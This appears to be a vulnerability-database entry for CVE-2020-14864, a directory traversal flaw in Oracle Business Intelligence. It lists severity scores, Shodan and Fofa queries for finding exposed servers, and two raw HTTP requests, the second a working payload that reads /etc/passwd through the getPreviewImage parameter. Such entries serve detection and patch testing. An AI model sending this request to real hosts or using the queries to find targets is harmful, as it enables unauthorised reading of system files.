| Title | Oracle Fusion - Directory Traversal/Local File Inclusion |
|---|---|
| Author | Ivo Palazzolo (@palaziv) |
| Severity | High |
| Impact | Successful exploitation of this vulnerability could allow an attacker to read sensitive files, execute arbitrary code, or gain unauthorized access to the system. |
| Remediation | Apply the latest security patches and updates provided by Oracle to fix this vulnerability. |
| CVSS Score | 7.5 |
| EPSS Score | 0.94019 |
| CVE ID | CVE-2020-14864 |
| CWE ID | CWE-22 |
| Shodan Query | http.title:"oracle business intelligence sign in" |
| Fofa Query | title="oracle business intelligence sign in" |
| Tags | cve cve2020 oracle lfi kev packetstorm vkev vuln |
Oracle Business Intelligence Enterprise Edition 5.5.0.0.0, 12.2.1.3.0, and 12.2.1.4.0 are vulnerable to local file inclusion vulnerabilities via “getPreviewImage.”
GET /analytics/saw.dll?bieehome&startPage=1 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 Safari/601.1.56
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-14864.yaml
🦈 Packet Capture: ⬇️ Download cve-2020-14864.pcap
N/AN/A